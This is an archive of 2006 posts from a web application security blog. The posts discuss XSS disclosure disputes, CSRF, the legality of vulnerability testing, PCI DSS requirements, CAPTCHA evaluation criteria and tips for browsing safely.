Thursday, September 28, 2006

XSS Disclosure Drama

Here's a quick link recap of the ongoing drama occurring on sla.ckers.org. Dozens and dozens of XSS issues are being disclosed in major websites, even in security companies (Acunetix, F5, ISC2, etc.). Acunetix and F5 say, we're not vulnerable! A couple security industry folk question the strategy of their response and offer they're own two cents worth of advice. The hackers strike back by identifying other XSS issues, this time with pictures of STALL0W3D!1. Acunetix says still no, must have been our honeypot.

Bottom line: Time to find and fix your XSS issues before you end up on the wall of shame, or worse.

Wednesday, September 27, 2006

When disclosure roles are reversed

Update: Another well written industry insider view point on the incident(s), 3 Rules of Incident Response for Public Affairs. Don't mind the silly alert pop-up.

Kelly Jackson Higgins (Dark Reading) posted a nice follow up to all the XSS disclosures going on, particularly ones within the websites of security companies. According the story both Acunetix and F5 denied they had any XSS issues. Fair enough, but as anyone could have predicted, the disagreement between the posters on sla.ckers.org and the vendors is bound to cause more activity, and indeed it already has. Its not like they can’t just look for more. For myself I'm not so much interested in this specific case, but more from a larger industry perspective.

I’ve said many times, no matter who you are or what you do, an incidents happen to everybody sooner or later. For security vendors, which I am, one of the last things you want is someone publicly disclosing vulnerabilities in your website. Especially when the issue is something you’re supposed to be able to protect against with your product or service. At that point the most important thing is how you go about handling the situation.

If the issue really did exist

You could take the approach of quietly fixing the vulnerability then denying the issue existed should anyone ask. Web application security vulnerabilities are difficult to verify after the fact. The problem with this approach is that it runs the risk of annoying the hacker types by not acknowledging the issue. They may take this as an opportunity to embarrass you further should they find something else you may have missed. I think we’d all prefer not become a continuing target.

Or

Come clean. Acknowledge there was a problem and that it was swiftly resolved. Provide some verbiage as to what changes are being made to make sure it never happens again. You could also supply a security contact email address should anyone find something else in the future. This approach shows honestly, integrity, and willingness to improve upon due diligence. Not only do you take the current matter off the table, you’re providing a private channel of communication before a situation becomes public.

Or

Blame the company hosting your website!

If the issue really didn’t exist

State clearly why you don’t think the vulnerability existed. In a non-defensive manner, ask for more information from the person in a private setting. They’ll appreciate the care and any conversation can be kept in confidence. Explain to whomever is interested that your looking into the matter and will promptly resolve any problems that surface.

My Advice

One way or the other we ALL better get used to dealing with vulnerability disclosure in our websites. Whoever we happen to work for won't matter. My advice is take the matter seriously and act with due care. Don’t fall into the trap of denial, work productively with the person disclosing, and get ahead of the issue by clearly stating what your doing about it. You’ll be better off.

Tuesday, September 26, 2006

CSRF, the sleeping giant

Cross-Site Request Forgery (aka CSRF or XSRF) is a dangerous vulnerability present in just about every website. An issue so pervasion and fundamental to the way the Web is designed to function we've had a difficult time even reporting it as a "vulnerability". Which is also a main reason why CSRF does not appear on the Web Security Threat Classification or the OWASP Top 10. Times are changing and it’s only a matter of time before CSRF hacks its way into the mainstream consciousness. Chris Shiflett (principal of OmniTI) and I were speaking about this today and how to best convey the issues importance. CSRF may in fact represent an industry challenge far exceeding that of Cross-Site Scripting (XSS).

CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet.

Dare we speak of The Dangers of Cross-Domain Ajax with Flash?

Challenges

Volume- Nearly every feature on every website is vulnerable to CSRF. When/if we begin reporting CSRF issues its going to be on the average of dozens per website, thousands when counting open source and commercial web applications (look out bugtraq), and in the millions when speaking on a Web-wide scale.

Identification- Finding CSRF is very difficult to automate with current scanning technology and by enlarge must be performed manually. Therefore what would be considered a comprehensive vulnerability assessment becomes more time consuming and expensive.

Hard to Solve- This is the real bad part about CSRF, it’s much more difficult to fix. That is, relative to the 1 or 2 line fixes we’re used to with XSS or SQL Injection. CSRF solutions may require CAPTCHA's (blech), Session Tokens, Flow Control, etc. Solutions requiring many more lines of code where a proper implementation is harder to get right. Imagine having to inform a developer they're going to have to put CAPTCHA’s or Sessions Tokens on every one of the hundred forms. Ugh.

Where we go from here

We are looking ahead to a serious and wide-reaching yet-to-be-exploited vulnerability, which the bad guys will eventually figure out how to monetize and our solutions are sorely lacking. For those in the industry who want to make a significant difference, THE FIELD IS WIDE OPEN. We need generic and innovative technology solutions for both CSRF identification and defense.

Is testing for XSS illegal?

Update: Directly from Daniel Cuthbert himself.
Your posting needs to be updated to reflect current UK, and possibly future European, laws.
Testing ANY website without authorisation is illegal in the uk. Under the Computer Misuse Act of 1990, it states "It is an offense to make a computer perform a function and for that function to be deemed unauthorised by the owner of that computer". Simply put, by doing a simple GET on the site could be deemed illegal if the owner didnt want you to do that. Testing for XSS is a punishable offense and people will, and have, been charged with this in the UK.

Wow. This is a seriously broad definition, dangerously so. Thanks for the Daniel. I wonder how often this law is actually being used to prosecute. Coicidentially I there was another post on the legality of penetration testing today on SF pen-test, this time from Germany.

"in Germany we are about to implement the cybercrime treaty in local law with the number § 202 c. This change will make the possession, trafficking, making available and producing of tools with the *intention* for hacking and snooping traffic an offense punishable with up to a year in prison."

This might actually be helping the bad guys more than the good guys and also has implications for companies who run businesses making these tools (Even the big guys). Then I went and looked up the U.S. Computer Fraud and Abuse Act (via) wikipedia. According to the 6 items listed that are against the law, they all seems to have the qualifier of "intent to defraud". This wording seems saner to me.


------


RSnake’s message board sla.ckers.org has been on fire with cross-site scripting vulnerability disclosures. There has been intense media coverage from Dark Reading, InfoWorld, TechWorld, syndication to Dr. Dobb’s, and even a Slashdot’ing for good measure. We all know XSS is a huge problem, a problem likely to get worse, but one issue that hasn’t been raised is legality. On what side of the law do you land when disclosing proof-of-concept (PoC) that a website is vulnerable to XSS? This is particularly important in light of the recent hacking conviction stories of Eric McCarty (SQL Injection) and Daniel Cuthbert (Directory Traversal). I’m no lawyer, but here’s my take.

We know penetration testing a website without consent is unethical and possibly illegal. Gaining access to sensitive information is clearly crossing the line. This is where XSS is different. Testing websites for XSS has nominal impact and does not require actual exploitation of anything. There is no legit reason to go after names, addresses, cookies, credit card numbers, attack users, create worms, etc. Exploitation PoC MAY be required in the case of SQL Injection or Directory Traversal, but certainly not XSS. Creating an XSS PoC link displaying a JavaScript alert box is harmless and all you really need. If you used the hole to launch an XSS-Phishing Scam, that’s cut and dry illegal in my book.



Would this rational keep you on the safe side of the law? I think so, hope so, but I certainly don’t know so. My bet is in the next 12 months we'll find out.

Monday, September 25, 2006

Symantec and Mitre agree, its all about the web apps


The information security world is buzzing with web application security news. Headlines pour in daily about web worms, intranet hacking, JavaScript Malware, Hacking AJAX websites, XSS vulnerabilities published openly on major websites, and the open source WAF ModSecurity being acquired. It’s a lot to keep up with. Two years ago we were amazed to see an article a month, and if they were back-to-back we said, “look a trend”! Now today Symantec releases their Internet Security Threat Report for the first half of 2006, teeming with web application security data. Inside there is some highly revealing knowledge and I’ll quote some of the interesting bits relevant to our space.
  • Web application vulnerabilities made up 69% of all vulnerabilities this period.
  • Seventy-eight percent of easily exploitable vulnerabilities affected Web applications.
  • Symantec documented 2,249 new vulnerabilities in the first half of 2006. “… an 18% increase since in the second half of 2005.
This is huge and something the experts have been screaming about for a while. Not only do web application vulnerabilities represent the vast majority of documented isssues, they are also the easiest to exploit! The report then starts to answer some questions as to why.

The marked increase in the number of vulnerabilities can be attributed to the continued growth in those that affect Web applications.
The high number of these vulnerabilities is due in part to the popularity of Web applications and to the relative ease of discovering vulnerabilities in Web applications compared to other platforms. Additionally, Web applications generally have quicker release cycles than traditional desktop and server applications. This provides security researchers with a continually growing source of new applications to audit, particularly as, in many cases, Web applications do not undergo the same degree of quality assurance and testing as other applications.

More software, more vulnerabilities. Rapidly changing software, more vulnerabilities. No one checking for security, more vulnerabilities. Makes sense to me. The one thing left out is that web applications are where the money is. And as the report says, attacks are growing more targeted and financially motivated.

Web 2.0 security threats and AJAX attacks expected to increase.

Sheesh, can it get worse?

Symantec recommends that administrators employ a good asset management system or vulnerability alerting service and management system.

Tell them what they own and what risks are on the horizon.

Enterprises should devote sufficient resources to alerting and patch deployment solutions.

Yep, patch diligently.

If they are developing Web applications in-house, developers should be educated about secure development practices, such as the Secure Development Lifecycle and threat modeling. If possible, all Web applications should be audited for security prior to deployment.

Hey! That’s what I do for a living. WhiteHat Sentinel, continuous vulnerability assessment and management for websites. Thanks for the validation Symantec! :)

Symantec also recommends that before any Web service or application is implemented, it undergo a secure code audit to ensure that it is not vulnerable to possible attack.

This tip needs more clarity. Every business critical web application should undergo a source code review. To spot things such as backdoors, nothing is better, but the question is how often. Personally I think source code reviews should be performed before an initial website launch and between MAJOR updates. Any more becomes highly cost prohibitive and in my humble opinion, vulnerability assessment offer better ROI.

Only JavaScript could make someone this pissed


How to Create Pop-Up Windows
"Never, ever, ever use the javascript: pseudo-protocol for anything, ever ever ever ever again. Please. Pretty please. The next time I click on a hyperlink, only to have it cause an error in my browser, I am going to hunt down the author and pound them into holy oblivion. I'm not joking — I will kill someone. Maybe two... Perhaps an entire company-full."

More big Web App Attacks

News from Netcraft, cPanel Security Hole Exploited in Mass Hack
"HostGator says hackers compromised its servers using a previously unknown security hole in cPanel, the control panel software that is widely used by hosting providers. "I can tell you with all accuracy that this is definitely due to a cPanel exploit that provides root access and all cPanel servers are affected," said HostGator system administrator Tim Greer. "Thi
s issue affects all versions of cPanel, from what I can tell, from years ago to the current releases, including Stable, Release, Current and Edge."

Ouch. And it gets worse! Hacked web pages were used to spread IE exploits.

"Hackers gained access to HostGator's servers late Thursday and began
redirecting customer sites to outside web pages that exploit an unpatched VML security hole in Internet Explorer to infect web surfers with trojans."

Its clear that websites and browsers need to be made more secure. In my opinion, we're just seeing the beginning.


Sunday, September 24, 2006

ModSecurity Acquired



Update: An interview with Ivan Ristic via (cgisecurity.com)

Ivan Ristic (Thinking Stone), the man behind ModSecurity, has joined forces with commercial WAF vendor Breach Security. I've been recommending ModSecurity for a long time, so first order of business: ModSecurity will remain as open source, better yet more development resources, and an ambitious project roadmap that competitors should pay attention to. Awesome news!

This is a brilliant strategic move by Breach. They're acquiring a great piece of technology, instant leadership in WAF deployment, and a top-notch web application security professional to lead the charge. Properly executed this could be a huge win-win-win for Ivan, Breach, and the community.

Congratulations guys, we look forward to great things!

Thursday, September 21, 2006

Real Live XSS

Via Rsnake’s sla.ckers.org message board, XSS disclosures are in abundance! Dell, HP, MySpace, Photobucket, F5, Acunetix, and a slew of others are listed. Dark Reading has some timely coverage (“Hackers Reveal Vulnerable Websites”) with yours truly quoted. SEO Egghead has a funny PoC from a Harvard website (“Go to Princeton Instead! “) Most of the proof-of-concept XSS links appear safe enough to click on, but I don’t recommend it, just in case.

Monday, September 18, 2006

Web app vulnw take over top spots

Web application security is where the action is and more numbers to prove it.

Numbers from Mitre's CVE (via Steve Christey)
Cross-Site Scripting: Attackers' New Favorite Flaw
Web vulns top security threat index
Web flaws race ahead in 2006
Web app vulns go 1,2,3

"For 2006, 21.5 percent of the CVEs were XSS; 14 percent SQL injection; 9.5 percent php "includes" and 7.9 buffer overflow. Last year was the first time XSS jumped ahead of buffer overflows, with 16 percent; SQL injection accounted for 12.9 percent; and buffer overflows accounted for 9.8 percent."





Summarized Honeypot Compromises (2006)
All compromises were from web application security vulnerabilties or weak passwords.

Sunday, September 17, 2006

Another week another few web app hacks

It's hard to tell if more hacks are occuring at the web application layer, if they are being reported more often, or organizations are simply required to disclose when they occur. Whatever the case happens to be, interest in web application security by both the good guys and the bad guys is at an all time high. I noticed a couple of recent headlines where the incident looked to me like it was due to insecure web applications.

Second Life, a 3-D virtual world entirely built and owned by its residents, had some data of its 650,000 user-base compromised.

"Detailed investigation over the last two days confirmed that some of the unencrypted customer information stored in the database was compromised, potentially including Second Life account names, real life names and contact information, along with encrypted account passwords and encrypted payment information. No unencrypted credit card information is stored on the database in question. Unencrypted credit card information has not been compromised."

More headlines:
Urgent Security Announcement
Metaverse breached: Second Life customer database hacked
Second Life suffers security breach


Controversial audio tapes by Arnold Schwarzenegger uncovered on public web server.

"The Democratic rival to California Gov. Arnold Schwarzenegger acknowledged Tuesday that his aides were responsible for obtaining a controversial audio file in a move that has led to allegations of Web site hacking."

More headlines:
Rival behind Schwarzenegger Web flap
Radio Station Disputes Gov.'s Claim Speech Website Was Hacked
Schwarzenegger Hacking Claims Crumbling Like A Bunch Of Girlie Men
In A Politically Sticky Situation? Blame A Hacker!


Nikon Magazine website compromised

“During a nine-hour period Tuesday, nine new Nikon World subscribers were able to view personal information of 3,235 individuals who had registered for the magazine, going back to Jan. 1. The information that was accessible included subscribers' addresses, contact details and credit card information.”


XSS strikes again, this time faking a new Google service

“Except the Gmail plus service is actually fake and been put together by a persitent code insertion flaw (Not just XSS but any content) that allows users to host a customised search service on the Google domain.”

More headlines:
Google plugs phishing hole
What's Wrong With Google?
Gmail Plus or Google Danger?
Exploiting Google for Phishing
Phising Exploit Discovered in ‘Google Public Search Service’

RSnake, funny and insightful


RSnake had a couple of recent posts a that really got me thinking (he tends to have that impact on readers). One post was on single sign-on (SSO) and the other about surfing without JavaScript.

"For instance, I was visiting what was essentially a hacked site that had a redirection built into a Flash movie. Here I was, with Flash and JavaScript and Java turned off and yet I was still getting redirected. What’s the deal? Well, after doing a little research it turns out that
Flashblock requires that JavaScript is turned on. So to turn off Flash, I have to have JavaScript turned on - how is that helping me?"

For some reason this left me laughing for a good minute. Then for the life of me I couldn't figure out why no one noticed this before.

"Let’s say company-a.com has a website that you authenticate to. By virtue of single sign-on you are now authenticated to company-b.com. Now suddenly, CSRF via XSS in company-a.com that exploits company-b.com and would normally fail on company-b.com (becauuse previously I wasn’t logged in there) now functions. " ... "I’m in without even trying."


RSnake's exactly right. I hadn't run into SSO in so long, I forgot about this problem.

"The peril in single sign-on is that the least common denominator dictactes a large portion of the security for all members of the authentication network."

This also sounds a lot like the same issue Lex raised when considering email security to be more important than bank security. Essentially your off loading security to another entity and are you OK with that?

5 More Security Tips for Power Users

These tips go further than the usual advise of disabling JavaScript, Java, Active X, and Flash.

1) Delete your cache and cookies after each session
This sensitive information, which should be closely guarded, has a bad habit of becoming publicly accessible. If you’re using Firefox (and you are right?), the web developer toolbar has a nice feature to “Clear Private Data” under the miscellaneous pull-down. You could also set the history to zero and deny all cookies. Your call.

2) Beware of overly long URL’s
Be especially suspicious of URL’s wrapping more than a single line and heavily disguised with URL-encode characters. If your not sure about the true nature of a URL, decode it and check to see if it has any HTML tags embedded within. If it does, you probably DON'T want to click.

3) URL shortenners
Pranksters and bad guys alike are using URL redirect services like TinyURL, snipURL, notlong, shorl, and doiop to disguise potentially malicious URL’s. To double check on these URL’s I’ve been using the command line to issue an HTTP request directly to see where the Location header is pointing. If the redirect URL looks safe, then I’ll click. Never can be too careful with these things.

4) Damn those secrets questions!
Everyone eventually forgets a password and needs to regain access to their account. Most password recovery methods are fairly straightforward providing a few different options to verify your identity. The one method that really drives me crazy is the “clever” secret question and answers. There is no friggin’ way I’m giving any website the name of my 3rd grade kindergarten teacher, dog, or high school and certainly not my favorite color. If a breach was to occur, and they do all the time, then I’ve just lost MORE personal information. To circumvent this non-sense, I’ve begun treating secret QnA’s like username/password pairs. Imagine the surprise of the customer support person when I tell them the name of my dog is ji*P5c$r.

5) Use a virtual machine
For my tin-foil-hat-wearing-brethren, consider using VMWare when surfing off the reservation (so to speak). If anything strange happens during the current session, your important data remains well protected. Just remember to roll back to a known good state between sessions to protect your security and privacy.

Top 5 Tips to NOT Get Hacked Online

Update: WashingtonPost blogger Brian Krebs agrees with me on #1. "My advice: If you or someone you care about is in the habit of cruising the Web with IE, now would be a very good time to get acquainted with another browser that doesn't use IE's rendering engine, such as Firefox or Opera." Porn websites are exploiting IE 6 0-day vulnerabilities.

“Oh my God, I’m never doing anything on-line again!,”
is a common reaction to one of my web application hacking presentations. Recently I’ve been demonstrating how easily the average website or user can be hacked. No doubt scaring audiences has a certain mass appeal and gets people to pay attention to why the right security practices are of vital importance. People frequently ask if I still bank or shop online (of course I do), or how they can protect themselves when they do. For those who are not experts in computer security, here are my top 5 tips to a safer online experience (in addition to having firewalls, anti-virus, and patching diligently).

1) Switch your web browsers to Firefox, Mozilla, Safari, or anything else besides Internet Explorer
This is probably the single most important thing you can do to protect yourself online. I’ve mentioned before that I’m a fan of staying secure by staying out of the line of fire. Internet Explorer is well known for being in the crosshairs of viruses, spyware, and adware. I know I know, Microsoft is releasing the highly anticipated version 7, supposedly a security light-year ahead of everything else. A web browser so revolutionary it’s being pushed as a mandatory upgrade! Talk about an attractive target for malicious hackers. In my view it’s best to use an alternate product and remain out of the fray. If a website REALLY does need IE and you REALLY need to use the website, make sure the website is legit, then it’s reasonably safe to fire up IE.

2) Add more security to your web browser
No matter what browser you choose, the Web is a hostile place and they all need a little help to defend themselves. NoScript (Firefox extension), Netcraft Anti-Phishing Toolbar, E-Bay Toolbar, and Google Toolbar are great products that do just that. These add-ons help identify phishing websites, prevent your computer from being hacked, and passwords from falling into the wrong hands. Most people will only need the first two add-ons, but if you are an E-Bay buyer, using theirs is essential is well.

3) Don’t click on links in email, almost ever
Whenever possible try NOT to click on any links in email, especially since links are themselves are dangerous and phishing emails are difficult to spot. An ounce of paranoia is worth a pound of patches. If I’m unsure if an email is real, one thing I do is manually type the domain name into the web browser location bar. This way I know I’m on the real website. If Wells Fargo were to ask to verify my account information by “clicking here”, instead I type in wellsfargo.com then proceed to login. If Wells Fargo, or whatever the organization your doing business with, really wanted to verify the account information they would have asked at that point. Some email links are safer to click on than others. Like those sent in response to an action (account registration, password reset, order confirmation, etc) you might have performed on the website within the last several minutes.

4) Defend your Web Mail!
Hundred of millions of people use Web Mail, which in many ways email is more important to keep secure than your bank account. Many people have important online accounts tied to a single Web Mail address. If anyone gained access to your email account, all accounts associated to could be compromised as well. The best thing you can do is use unguessable passwords, change them ever six months or so, and don’t use that password anywhere else. Bonus points for deleting emails with any sensitive information.

5) Use a single credit card for online purchases
In light of recent events, chances are the CC #’s we use online are going to be stolen at some point. For that reason it’s best to try and limit any potential damage. Using a single credit card with just enough of a limit to conduct your online transactions makes it easier to monitor statements for any strange charges. Plus, any fraud is isolated to that one card. Also, refrain from using a debit card online since they don’t carry the consumer legal protections as credit cards.

Normally this is the part where the experts start talking about SSL and tells you to check for the lock symbol. In my experience just about every legit website accepting credit cards is now SSL-enabled. So the better advice is to make sure your actually on the legit website you think you are on. Otherwise SSL isn’t going to matter much anyway.

Monday, September 11, 2006

De-Anonymize Web Surfers with JS Malware

RSnake's research continues with another choice discovery by connecting together various JavaScript Malware hacks. To get the full technical picture you'll have to read several posts, starting with DNS Pinning Just Got Worse and Using CSS to De-Anonymize. This stuff gets complicated really quickly, not sure if I understand it all yet.

The deal here is that JavaScript Malware has access to a browser's DOM and History. We knew that from my ealier JS/CSS History PoC. Once your browser is infected with JavaScript Malware, the attacker makes educated guesses at internal network hostnames common to organizations (http://intranet/) to see if you've been there. And if its not in your history, they'd use iframes and force a user to visit the URL, then re-check the history. Once they have an intranet target, use DNS pinning, and read the website across domains. They now know whom you work for. Rinse repeat and find out more about the victim.

Hack upon hack upon hack.



Saturday, September 09, 2006

email security over bank security

Last week Lex, WhiteHat Security co-founder, was saying to me that it’s much worse to have your email (Web Mail) broken into than your bank (Web Bank). Confused, my first though was, “how can this be, that’s where my money is?” He explained that a very common forgot password (FP) system asks you to enter your email address, in return sends you a new password or a reset link. We’ve all seen and probably used these simple implementations. Lex’s logic was if your email box is hacked, every web-account associated to that address (using a send-email-forgot-password-system) could be compromised, including your bank. A malicious hacker could simply sift through the victims email to get the target list. This is a scary thought.

Lex may be right, I never thought about it this way before. Hundreds of millions of people regularly use GMail, AOL Mail, Yahoo Mail, Microsoft Hotmail, and a million other Web Mail providers everyday. Websites using a send-email-forgot-password-system are offloading identity verification to another website. Today’s savvy netizens have online accounts for airlines, hotels, rental cars, tax records, books, auctions, payment systems, loans, insurance, often all tied together via a single email address with a web-based interface. A well-crafted Cross-Site Scripting (XSS) attack would give direct access to crown jewels.

I’m going to have to rethink my personal information security strategy. Maybe this is also a good reason to create a top-5 list for normal users.

Thursday, September 07, 2006

New PCI Data Security Standard released!

Update: Nothing I've read in the updated PCI DSS or those who commented have said the text has been watered down. PCI DSS is well thought out, balanced, and comprehensive. Substitute "carholder information" for any type of sensitive information and it immediately useful elsewhere (banking?). What counts is enforcement. This is where are a lot of questionr emain about PCI DSS.


1) How strongly will the standard be enforced? Fines, higher fees, suspensions?
2) What vulnerabilities are ASV's going to be capable of finding?
3) How strongly will ASV's and QSA's be vetted to get on the lists? And what happens if they water down their processes and provide poor service?
4) How does a merchant know what vendors specialize in web application security?
5) What is considered an application layer firewall?



It's the day we've all be waiting for! *queue the drums* A year and a half we waited wondering what the mega payment card brands were going to decree about the Payment Card Industry Data Security Standard (PCI DSS). The infosec industry speculated, raised concerns, and purported rumors. Yet, we had only a vague idea of what the future of PCI would hold for its subordinates. Then yesterday, the PCI DSS v1.1 was finally released! *sound the trumpets* It's time!

One Committee to rule them all

Announced is the formation of the PCI Security Standards Council (SSC). A fellowship of 5 with representatives from AMEX, Discover, JCB, MasterCard, and Visa. They serve as central authority overseeing updates to the PCI DSS, as well as training and certification of Qualified Security Assessors (QSA) and Approved Scanning Vendors (ASV). The payment card brands individually, and further to the acquiring banks, are responsible for enforcement of PCI DSS amongst merchants and service providers.

What does the Committee command?

PCI DSS commands compliance with 12 core requirements. Simple enough since it’s the same 12 from before. Changes to the standard are mostly for cosmetics, consistency, and clarity. The OWASP Top Ten remains the recommended best practice for software development, despite its creators saying this is not what it's meant for. The significant change in PCI DSS is the addition of section 6.6:

6.6 Ensure that all web-facing applications are protected against known attacks by applying either of the following methods:
• Having all custom application code reviewed for common vulnerabilities by an organization that specializes in application security
• Installing an application layer firewall in front of web-facing applications.
Note: This method is considered a best practice until June 30, 2008, after which it becomes a requirement.

Hoowah! Assemble the troops for battle.

This will take an army of thousands

Lets attempt to estimate the nation-wide monetary cost to merchants and workload required of "organization that specializes in application security". Netcraft says there are 96,854,877 sites and 497,833* SSL certificates in circulation. Assuming the vast majority of websites potentially accepting credit cards (CC) use SSL, we'll round up to 500,000 total certs in circulation. Assuming only 10% of websites using SSL accept CC's, that leaves a world of 50,000 websites needing source code reviews. Keep in mind we're only counting SSL/CC websites. PCI DSS section 6.6 says "all web-facing applications" from merchants need source code reviews, so the world may in fact be exponentially larger.

* Total Certs = 358,938 / 72.1%
(Sum of SSL certs and market shares of Verisign and GeoTrust)


A common source code review performed by the average reviewer on the average small-mid-sized web application costs about $40,000. At $150 per hour (bill rate), that’s 267 man-hours per review. Let's try some of my gorilla math.

To source code review all 50,000 websites each year requires:
  • 13,350,000 total man-hours (50,000 * 267 hours)
  • 6,675 qualified source code reviewers (13,350,000 / 2000 full-time hours per year)
  • $2,000,000,000 annual economic burden on merchants! ($40,000 * 50,000)
If anyone wants to help adjust my numbers based on better figures, by all means let me know. My thinking is there’s no way merchants are going to endure even close that much cost for source code reviews even if there were over 6,000 qualified source code reviewers read to go. That means 2008 might actually come in 2007.

Fall back behind the web application firewalls!

ModSecurity, an open source intrusion detection and prevention engine for web applications, may be just what organizations need to fulfill PCI DSS compliance obligations without the sticker shock. According to a recent Forrester Research report on Web Application Firewalls (Q2 June 2006), "...ModSecurity is by far the most extensively deployed Web application firewall, with more than 10,000 customers." and "ModSecurity's stringent implementation standards — build nothing unless you approach the highest level of security — will push the entire Web application firewall market toward higher-quality products." I've been recommending ModSecurity for a long time and my bet is we'll see huge surge in installations. Especially since commercial licensing, support, and a soon-to-be-released ModSecurity Console is on the horizon.

Weaknesses in the defenses

Validation of Compliance is an instrumental part of PCI DSS otherwise merchants and service providers could simply pay lip service to the payment brands. Approved Scanning Vendors (ASV) like WhiteHat Security ensure there are no high-level vulnerabilities in the web-facing networks and websites. PCI DSS and the Security Scanning Procedures documents provide guidance as to the scope of everything we’re supposed to scan, how, and how often. We’re instructed to do no harm, what reports must contain, and how results are to be interpreted.

"11.2 Run internal and external network vulnerability scans at least quarterly and after any significant change in the network (such as new system component installations, changes in network topology, firewall rule modifications, product upgrades).
Note: Quarterly external vulnerability scans must be performed by a scan vendor qualified by the payment card industry. Scans conducted after network changes may be performed by the company’s internal staff.
11.3 Perform penetration testing at least once a year and after any significant infrastructure or application upgrade or modification (such as an operating system upgrade, a sub-network added to the environment, or a web server added to the environment). These penetration tests must include the following:
11.3.1 Network-layer penetration tests
11.3.2 Application-layer penetration tests."

ASV's are informed of just about everything, EXCEPT WHAT VULNERABILITIES WE NEED TO BE ABLE TO FIND! I’ve not been able to find anything documented about the vulnerabilities, checks, or classes of attack capabilities required for ASV acceptance. Though to become an ASV, you need to pass the test.

“How to Become an Approved Scanning Vendor
For the actual test, each applicant runs its test tool(s) against the Council's test Web perimeter and submits its results. After remotely scanning the test infrastructure, the vendor must identify the vulnerabilities and misconfigurations found, and report its findings in both executive and detailed test reports.”

As I said, WhiteHat Security is an ASV and hence passed the test. We strongly believe being able to find all vulnerabilities all the time (the goal) is the only way to achieve adequate security. Since we go above and beyond, the minimum bar for passing didn’t matter much. However, without a solid minimum bar, any script-kiddy with a check-for-nothing-scanner could become an ASV and start providing insanely cheap PCI compliance reports complete with false sense of security at no extra charge. I’m also unable to do the same math for quarterly scans (as for source code review) because there is no way to gauge price per website.

Goes to show compliance and security are two different things.

Wednesday, September 06, 2006

Eric McCarty pleads to SQL Injection on USC site

Rob Lemos from SecurityFocus writes about the recent developments in the case of Eric McCarty and the University of Southern California (USC).

I've been following Eric's story since he first made news by disclosing a SQL Injection vulnerability
in USC's online student application. Eric's plea agreement stipulates that he'll serve three years of probation, possibly some home detention, and pay $36,800 in damages to USC. Could have been worse for Eric, but still seems like a lot to pay for helping to protect the sensitive information of thousands. Don't get me wrong, what Eric did was against the rules, but he's not one of the "bad guys" we need to worry about either.

Only a few days ago I wrote that vulnerability "discovery" is more important than disclosure to the information security industry. Talk about validation! "The case should send a message to vulnerability researchers that they must obey the law when looking for flaws in Web sites", said Michael C. Zweiback, Assistant U.S. Attorney for the Central District of California. We get the message and also trying to figure out what the lasting repercussions will be to software (in)-security.

Who's on the side of the consumer?

What hopefully Mr.
Zweiback and others realize is the REAL "bad guys", the profit-driven-extortionist -identity- thieving- scamming- fraudulent- criminal- scum-of-the-earth, are not going to stop. And they're certainly not going to disclose their findings and risk prosecution either. Everything gets a pen-test, with permission or otherwise. What this prosecution means is the "good guys" will think twice about discovering or disclosing anything they might uncover or stumble upon. If one of the few precious checks-and-balances the industry has is out of the picture, then who's on the side of the consumer? PCI? Please. There are 96,854,877 sites out there. I'm guessing way less than 1% are professionally assessed for security.

As for Eric McCarty, I wish him the best of luck, and hopefully he'll be able to continue pursuing his career.

CAPTCHA Effectiveness Test

Update 1: The list has been slightly improved and also added examples of how the test should be applied.

Update 2: Using pornography websites, there is clever technique leveraging humans that works well in defeating CAPTHA’s (A comment on my last post found an early reference). An attacker offers a free adult website granting access to any visitor who fills out CAPTCHA images. The website, acting as a CAPTCHA proxy, downloads the obfuscated image from the target then redisplays it to the visitor. Once the visitor fills out the image, or two, or three they are granted access. The attacker is then free to perform their intended action. Effective, simple, and what caused me to add #4 to the CET.


CAPTCHA
"Completely Automated Public Turing Test to Tell Computers and Humans Apart"

Just about everyone on-line has seen one typed in one of these by now, even if they didn't know exactly what it was for. CAPTCHA's are designed to prevent automated account registration, blog spam, BBS spam, whois DB lookup, login brute-force, password recovery, etc. People have attempted all sorts of strange and interesting methods to stop the bots. The obfuscated-text-in-an-image variety is the one most commonly used. The problem is not all CAPTCHA systems are created equally. Some are superior to others, but its difficult to tell exactly why. What us web application security people need is a methodology to measure the effectiveness of a CAPTCHA system. I first wrote about the CAPTCHA Effectiveness Test just over a year ago and promised to eventually make an update.

CAPTCHA Effectiveness Test

1) Test should be administered where the human and the server are remote over the network.
2) Test should be simple for humans to pass.
* Humans should fail less than 0.1% on the first attempt.
3) Test should be solvable by humans in less than a several seconds.
4) Test should only be solvable by the human to which it was presented.
5) Test should be hard for computer to pass
* Correctly guessing the answer should be less than 1 in 1,000,000, even after 24-hours of analysis.
6) Knowledge of previous test questions, answers, results, or combination thereof should not impact the predictability of following tests.
7) Test should not discriminate against humans with visual or hearing impairments.
8) Test should not possess a geographic, cultural, or language bias.


Applying the CET.
Given that the implementation is secure (many or not).

obfuscated-text-in-an-image
1) Pass
2) Pass
3) Pass
4) Fail
5) Pass
6) Pass
7) Fail
8) Pass

Hot Captcha
1) Pass
2) Fail
3) Pass
4) Fail
5) Pass
6) Fail
7) Fail
8) Fail



Still work work in progress...


Tuesday, September 05, 2006

JavaScript Malware embedded in everything

pdp (architect) from gnucitizen has been a on tear releasing new methods of injecting JavaScript Malware into a web browser. Most recently with backdooring QuickTime Movies and Flash Objects, complete with visual tutorials and source code. Then pdp has the AttackAPI, which "provides simple and intuitive web programmable interface for composing attack vectors with JavaScript and other client (and server) related technologies." I haven't had time to play with yet, but it looks really cool! Nice job pdp, keep up the good work!

Let's stop for a moment take stock of where we are at with web browser security.

JavaScript: Bad
Flash: Bad
QuickTime: Bad
Flash: Bad
PDF: Bad
Applets: Bad
ActiveX: Very Bad
Firefox Extensions: Safe, but vultures are circling.
CSS: Safe, but vultures are circling.

Now what about mp3's, wmv's, midi's, etc, do these have facilities for including JavaScript? Maybe its time to go back to Lynx. Then what fun would the world be. :)

Firefox is smart!

I was messing around with infinite 302 redirects using the URL shorteners. I set-up the following URL's - http://doiop.com/302_1 redirects to http://doiop.com/302_2 would redirect back to http://doiop.com/302_1

When I tested in Firefox (1.5.0.6), low and behold it detected it!


Firefox has detected that the server is redirecting the request for this address in a way that will never complete.
* This problem can sometimes be caused by disabling or refusing to accept
cookies.

